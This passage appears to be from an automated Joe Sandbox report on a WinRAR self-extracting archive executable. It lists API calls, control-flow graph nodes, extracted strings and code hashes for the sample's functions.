                                                                  • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 0046BF6B
                                                                  • GetDlgItem.USER32(?,00000066), ref: 0046BF85
                                                                  • SetWindowTextW.USER32(00000000,0049A472), ref: 0046BFA7
                                                                  • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0046C007
                                                                  • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0046C01A
                                                                  • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 0046C0BD
                                                                  • EnableWindow.USER32(00000000,00000000), ref: 0046C197
                                                                  • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 0046C1D9
                                                                    • Part of subcall function 0046C73F: __EH_prolog.LIBCMT ref: 0046C744
                                                                  • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0046C1FD
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l_wcschr
                                                                  • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$PDGu<F$STARTDLG$^F$__tmp_rar_sfx_access_check_%u$hF$winrarsfxmappingfile.tmp$QH
                                                                  • API String ID: 3829768659-2819455000

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(kernel32), ref: 0046087C
                                                                  • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0046088E
                                                                  • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 004608BF
                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00460B69
                                                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00460B83
                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00460B93
                                                                  • ReadFile.KERNEL32(00000000,?,00007FFE,|<H,00000000), ref: 00460BB1
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00460C09
                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00460C1E
                                                                  • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,|<H,?,00000000,?,00000800), ref: 00460C72
                                                                  • GetFileAttributesW.KERNELBASE(?,?,|<H,00000800,?,00000000,?,00000800), ref: 00460C9C
                                                                  • GetFileAttributesW.KERNEL32(?,?,D=H,00000800), ref: 00460CD8
                                                                    • Part of subcall function 0046081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00460836
                                                                    • Part of subcall function 0046081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0045F2D8,Crypt32.dll,00000000,0045F35C,?,?,0045F33E,?,?,?), ref: 00460858
                                                                  • _swprintf.LIBCMT ref: 00460D4A
                                                                  • _swprintf.LIBCMT ref: 00460D96
                                                                    • Part of subcall function 00454092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004540A5
                                                                  • AllocConsole.KERNEL32 ref: 00460D9E
                                                                  • GetCurrentProcessId.KERNEL32 ref: 00460DA8
                                                                  • AttachConsole.KERNEL32(00000000), ref: 00460DAF
                                                                  • _wcslen.LIBCMT ref: 00460DC4
                                                                  • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00460DD5
                                                                  • WriteConsoleW.KERNEL32(00000000), ref: 00460DDC
                                                                  • Sleep.KERNEL32(00002710), ref: 00460DE7
                                                                  • FreeConsole.KERNEL32 ref: 00460DED
                                                                  • ExitProcess.KERNEL32 ref: 00460DF5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  Similarity
                                                                  • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                                  • String ID: (=H$,<H$,@H$0?H$0AH$4BH$8>H$D=H$DXGIDebug.dll$H?H$H@H$HAH$P>H$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$T=H$`@H$d?H$dAH$dwmapi.dll$h=H$h>H$kernel32$uxtheme.dll$|<H$|?H$|@H$<H$>H$?H$@H$AH
                                                                  • API String ID: 1207345701-2028585871

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 0046C744
                                                                    • Part of subcall function 0046B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0046B3FB
                                                                    • Part of subcall function 0046AF98: _wcschr.LIBVCRUNTIME ref: 0046B033
                                                                  • _wcslen.LIBCMT ref: 0046CA0A
                                                                  • _wcslen.LIBCMT ref: 0046CA13
                                                                  • SetWindowTextW.USER32(?,?), ref: 0046CA71
                                                                  • _wcslen.LIBCMT ref: 0046CAB3
                                                                  • _wcsrchr.LIBVCRUNTIME ref: 0046CBFB
                                                                  • GetDlgItem.USER32(?,00000066), ref: 0046CC36
                                                                  • SetWindowTextW.USER32(00000000,?), ref: 0046CC46
                                                                  • SendMessageW.USER32(00000000,00000143,00000000,0049A472), ref: 0046CC54
                                                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0046CC7F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  Similarity
                                                                  • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcschr_wcsrchr
                                                                  • String ID: %s.%d.tmp$<br>$<F$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$F
                                                                  • API String ID: 986293930-2894835992
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 0045DA70
                                                                  • _wcschr.LIBVCRUNTIME ref: 0045DA91
                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0045DAAC
                                                                    • Part of subcall function 0045C29A: _wcslen.LIBCMT ref: 0045C2A2
                                                                    • Part of subcall function 004605DA: _wcslen.LIBCMT ref: 004605E0
                                                                    • Part of subcall function 00461B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0045BAE9,00000000,?,?,?,00010424), ref: 00461BA0
                                                                  • _wcslen.LIBCMT ref: 0045DDE9
                                                                  • __fprintf_l.LIBCMT ref: 0045DF1C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  Similarity
                                                                  • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                                                                  • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a$9H
                                                                  • API String ID: 557298264-3298731444

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 0046B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0046B579
                                                                    • Part of subcall function 0046B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0046B58A
                                                                    • Part of subcall function 0046B568: IsDialogMessageW.USER32(00010424,?), ref: 0046B59E
                                                                    • Part of subcall function 0046B568: TranslateMessage.USER32(?), ref: 0046B5AC
                                                                    • Part of subcall function 0046B568: DispatchMessageW.USER32(?), ref: 0046B5B6
                                                                  • GetDlgItem.USER32(00000068,004AFCB8), ref: 0046D4E8
                                                                  • ShowWindow.USER32(00000000,00000005,?,?,?,0046AF07,00000001,?,?,0046B7B9,0048506C,004AFCB8,004AFCB8,00001000,00000000,00000000), ref: 0046D510
                                                                  • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0046D51B
                                                                  • SendMessageW.USER32(00000000,000000C2,00000000,004835F4), ref: 0046D529
                                                                  • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0046D53F
                                                                  • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0046D559
                                                                  • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0046D59D
                                                                  • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0046D5AB
                                                                  • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0046D5BA
                                                                  • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0046D5E1
                                                                  • SendMessageW.USER32(00000000,000000C2,00000000,004843F4), ref: 0046D5F0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  Similarity
                                                                  • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                  • String ID: \
                                                                  • API String ID: 3569833718-2967466578

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • _wcslen.LIBCMT ref: 0046D7AE
                                                                  • ShellExecuteExW.SHELL32(?), ref: 0046D8DE
                                                                  • ShowWindow.USER32(?,00000000), ref: 0046D91D
                                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 0046D959
                                                                  • CloseHandle.KERNEL32(?), ref: 0046D97F
                                                                  • ShowWindow.USER32(?,00000001), ref: 0046D9E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  Similarity
                                                                  • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                                  • String ID: .exe$.inf$PDGu<F$hF$rF
                                                                  • API String ID: 36480843-1196516857

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00475695,00475695,?,?,?,0047ABAC,00000001,00000001,2DE85006), ref: 0047A9B5
                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0047ABAC,00000001,00000001,2DE85006,?,?,?), ref: 0047AA3B
                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0047AB35
                                                                  • __freea.LIBCMT ref: 0047AB42
                                                                    • Part of subcall function 00478E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0047CA2C,00000000,?,00476CBE,?,00000008,?,004791E0,?,?,?), ref: 00478E38
                                                                  • __freea.LIBCMT ref: 0047AB4B
                                                                  • __freea.LIBCMT ref: 0047AB70
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                  • String ID:
                                                                  • API String ID: 1414292761-0
                                                                  • Opcode ID: af612f83698891605cd3ea21b8ab56bf9f97a529b8b3c28aac6a9703954de0ca
                                                                  • Instruction ID: bdca0a099c63e61bc589666b04300d8ffd936fae4b2959d7b7e27805329292c9
                                                                  • Opcode Fuzzy Hash: af612f83698891605cd3ea21b8ab56bf9f97a529b8b3c28aac6a9703954de0ca
                                                                  • Instruction Fuzzy Hash: 5751CA72610216ABDB258E65CC41EEF77AADBC4714F15862EFE08D6140DB38EC60C79A

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 977 473b72-473b7c 978 473bee-473bf1 977->978 979 473bf3 978->979 980 473b7e-473b8c 978->980 981 473bf5-473bf9 979->981 982 473b95-473bb1 LoadLibraryExW 980->982 983 473b8e-473b91 980->983 986 473bb3-473bbc GetLastError 982->986 987 473bfa-473c00 982->987 984 473b93 983->984 985 473c09-473c0b 983->985 989 473beb 984->989 985->981 990 473be6-473be9 986->990 991 473bbe-473bd3 call 476088 986->991 987->985 988 473c02-473c03 FreeLibrary 987->988 988->985 989->978 990->989 991->990 994 473bd5-473be4 LoadLibraryExW 991->994 994->987 994->990
                                                                  APIs
                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,00473C35,?,?,004B2088,00000000,?,00473D60,00000004,InitializeCriticalSectionEx,00486394,InitializeCriticalSectionEx,00000000), ref: 00473C03
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: FreeLibrary
                                                                  • String ID: api-ms-
                                                                  • API String ID: 3664257935-2084034818
                                                                  • Opcode ID: f15253e927cc4506bdc7c366d8d3e47758bcd9fb7554a5c37cbe0e5d132058c0
                                                                  • Instruction ID: 8e6d024fd63e944017cc54defd4619229c1538912fa2acdd10ee38b134db1e73
                                                                  • Opcode Fuzzy Hash: f15253e927cc4506bdc7c366d8d3e47758bcd9fb7554a5c37cbe0e5d132058c0
                                                                  • Instruction Fuzzy Hash: D711E732A44221ABCB229F689C4179E37A49F01772F214662F919EB291D778FF0097DD

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 995 46abab-46abca GetClassNameW 996 46abf2-46abf4 995->996 997 46abcc-46abe1 call 461fbb 995->997 999 46abf6-46abf8 996->999 1000 46abff-46ac01 996->1000 1002 46abe3-46abef FindWindowExW 997->1002 1003 46abf1 997->1003 999->1000 1002->1003 1003->996
                                                                  APIs
                                                                  • GetClassNameW.USER32(?,?,00000050), ref: 0046ABC2
                                                                  • SHAutoComplete.SHLWAPI(?,00000010), ref: 0046ABF9
                                                                    • Part of subcall function 00461FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0045C116,00000000,.exe,?,?,00000800,?,?,?,00468E3C), ref: 00461FD1
                                                                  • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0046ABE9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                  • String ID: @Ut$EDIT
                                                                  • API String ID: 4243998846-2065656831
                                                                  • Opcode ID: 86211eb72ed1a2d5fb3239aa348ae7b2343751e65eea9c8494f8ad8da8b70da2
                                                                  • Instruction ID: 1f4dd851a9c83e5f3a2238df4c6ddb66e2120cc6680a26ecae492ea18e22eba0
                                                                  • Opcode Fuzzy Hash: 86211eb72ed1a2d5fb3239aa348ae7b2343751e65eea9c8494f8ad8da8b70da2
                                                                  • Instruction Fuzzy Hash: 65F0E232A0062877DB206A259C09F9B726C9F42F01F084522BA00B2184E768EA418ABF

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 0046081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00460836
                                                                    • Part of subcall function 0046081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0045F2D8,Crypt32.dll,00000000,0045F35C,?,?,0045F33E,?,?,?), ref: 00460858
                                                                  • OleInitialize.OLE32(00000000), ref: 0046AC2F
                                                                  • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0046AC66
                                                                  • SHGetMalloc.SHELL32(00498438), ref: 0046AC70
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                  • String ID: riched20.dll$3Qo
                                                                  • API String ID: 3498096277-4232643773
                                                                  • Opcode ID: f0fa8f5a012ffd4b2303338edabe786586a56b03b31dd20139105a04bdbb98c5
                                                                  • Instruction ID: 52bea8ebe04cc11f2063bd6c1a486a469623910c510bd2d2f37d6819da8c503c
                                                                  • Opcode Fuzzy Hash: f0fa8f5a012ffd4b2303338edabe786586a56b03b31dd20139105a04bdbb98c5
                                                                  • Instruction Fuzzy Hash: 3EF04FB1900209ABCB10BFAAD8499AFFFFCEF84705F00416BA401A2201DBB856058BA5

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1008 4598e0-459901 call 46ec50 1011 459903-459906 1008->1011 1012 45990c 1008->1012 1011->1012 1013 459908-45990a 1011->1013 1014 45990e-45991f 1012->1014 1013->1014 1015 459927-459931 1014->1015 1016 459921 1014->1016 1017 459936-459943 call 456edb 1015->1017 1018 459933 1015->1018 1016->1015 1021 459945 1017->1021 1022 45994b-45996a CreateFileW 1017->1022 1018->1017 1021->1022 1023 45996c-45998e GetLastError call 45bb03 1022->1023 1024 4599bb-4599bf 1022->1024 1029 4599c8-4599cd 1023->1029 1030 459990-4599b3 CreateFileW GetLastError 1023->1030 1026 4599c3-4599c6 1024->1026 1028 4599d9-4599de 1026->1028 1026->1029 1032 4599e0-4599e3 1028->1032 1033 4599ff-459a10 1028->1033 1029->1028 1031 4599cf 1029->1031 1030->1026 1034 4599b5-4599b9 1030->1034 1031->1028 1032->1033 1035 4599e5-4599f9 SetFileTime 1032->1035 1036 459a12-459a2a call 460602 1033->1036 1037 459a2e-459a39 1033->1037 1034->1026 1035->1033 1036->1037
                                                                  APIs
                                                                  • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00457760,?,00000005,?,00000011), ref: 0045995F
                                                                  • GetLastError.KERNEL32(?,?,00457760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0045996C
                                                                  • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00457760,?,00000005,?), ref: 004599A2
                                                                  • GetLastError.KERNEL32(?,?,00457760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 004599AA
                                                                  • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00457760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 004599F9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: File$CreateErrorLast$Time
                                                                  • String ID:
                                                                  • API String ID: 1999340476-0
                                                                  • Opcode ID: fc646577122fe414a8353d0f06cbf8488708208ff90b7df6f8faf50211434d5d
                                                                  • Instruction ID: 6fc6cc302b83fe61b59388cf1c1514bc88592cd853f8c87a8bfb801e80fdea26
                                                                  • Opcode Fuzzy Hash: fc646577122fe414a8353d0f06cbf8488708208ff90b7df6f8faf50211434d5d
                                                                  • Instruction Fuzzy Hash: 86311670544745AFD7209F24CC45BDBBBD4BB05325F100B1EF9A1963D2D3A85D48CB99

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1067 46b568-46b581 PeekMessageW 1068 46b583-46b597 GetMessageW 1067->1068 1069 46b5bc-46b5be 1067->1069 1070 46b5a8-46b5b6 TranslateMessage DispatchMessageW 1068->1070 1071 46b599-46b5a6 IsDialogMessageW 1068->1071 1070->1069 1071->1069 1071->1070
                                                                  APIs
                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0046B579
                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0046B58A
                                                                  • IsDialogMessageW.USER32(00010424,?), ref: 0046B59E
                                                                  • TranslateMessage.USER32(?), ref: 0046B5AC
                                                                  • DispatchMessageW.USER32(?), ref: 0046B5B6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: Message$DialogDispatchPeekTranslate
                                                                  • String ID:
                                                                  • API String ID: 1266772231-0
                                                                  • Opcode ID: d5a480ec17f3b5698f36ff2d7817c0ca63757e66e3ac9e9b6edb4040231e65e7
                                                                  • Instruction ID: b83f5299b31d19df5a1a76ea5e1673a9591e094383d35c925efc8bd1fabfd274
                                                                  • Opcode Fuzzy Hash: d5a480ec17f3b5698f36ff2d7817c0ca63757e66e3ac9e9b6edb4040231e65e7
                                                                  • Instruction Fuzzy Hash: EEF0BD71A0111ABB8B20AFE69C4CDDB7FACEE052957004525B906D2114FB38E645CBF9

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1072 459785-459791 1073 459793-45979b GetStdHandle 1072->1073 1074 45979e-4597b5 ReadFile 1072->1074 1073->1074 1075 4597b7-4597c0 call 4598bc 1074->1075 1076 459811 1074->1076 1080 4597c2-4597ca 1075->1080 1081 4597d9-4597dd 1075->1081 1078 459814-459817 1076->1078 1080->1081 1082 4597cc 1080->1082 1083 4597df-4597e8 GetLastError 1081->1083 1084 4597ee-4597f2 1081->1084 1085 4597cd-4597d7 call 459785 1082->1085 1083->1084 1086 4597ea-4597ec 1083->1086 1087 4597f4-4597fc 1084->1087 1088 45980c-45980f 1084->1088 1085->1078 1086->1078 1087->1088 1090 4597fe-459807 GetLastError 1087->1090 1088->1078 1090->1088 1092 459809-45980a 1090->1092 1092->1085
                                                                  APIs
                                                                  • GetStdHandle.KERNEL32(000000F6), ref: 00459795
                                                                  • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 004597AD
                                                                  • GetLastError.KERNEL32 ref: 004597DF
                                                                  • GetLastError.KERNEL32 ref: 004597FE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$FileHandleRead
                                                                  • String ID:
                                                                  • API String ID: 2244327787-0
                                                                  • Opcode ID: e227209f017ca70e03808fbcdd48de475d1e896b8db29ea5116ee5359894090e
                                                                  • Instruction ID: cd8a3bb57c9e97338396dfeb5dcd65337464cefb0f697d4617954a0a2ed1cea4
                                                                  • Opcode Fuzzy Hash: e227209f017ca70e03808fbcdd48de475d1e896b8db29ea5116ee5359894090e
                                                                  • Instruction Fuzzy Hash: 6F118630520204FBDF206F65C80466E77A9FB46727F20892BFC1685292D7789E4CDB69

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1093 47ad34-47ad48 1094 47ad55-47ad70 LoadLibraryExW 1093->1094 1095 47ad4a-47ad53 1093->1095 1097 47ad72-47ad7b GetLastError 1094->1097 1098 47ad99-47ad9f 1094->1098 1096 47adac-47adae 1095->1096 1101 47ad7d-47ad88 LoadLibraryExW 1097->1101 1102 47ad8a 1097->1102 1099 47ada1-47ada2 FreeLibrary 1098->1099 1100 47ada8 1098->1100 1099->1100 1104 47adaa-47adab 1100->1104 1103 47ad8c-47ad8e 1101->1103 1102->1103 1103->1098 1105 47ad90-47ad97 1103->1105 1104->1096 1105->1104
                                                                  APIs
                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,0045D710,00000000,00000000,?,0047ACDB,0045D710,00000000,00000000,00000000,?,0047AED8,00000006,FlsSetValue), ref: 0047AD66
                                                                  • GetLastError.KERNEL32(?,0047ACDB,0045D710,00000000,00000000,00000000,?,0047AED8,00000006,FlsSetValue,00487970,FlsSetValue,00000000,00000364,?,004798B7), ref: 0047AD72
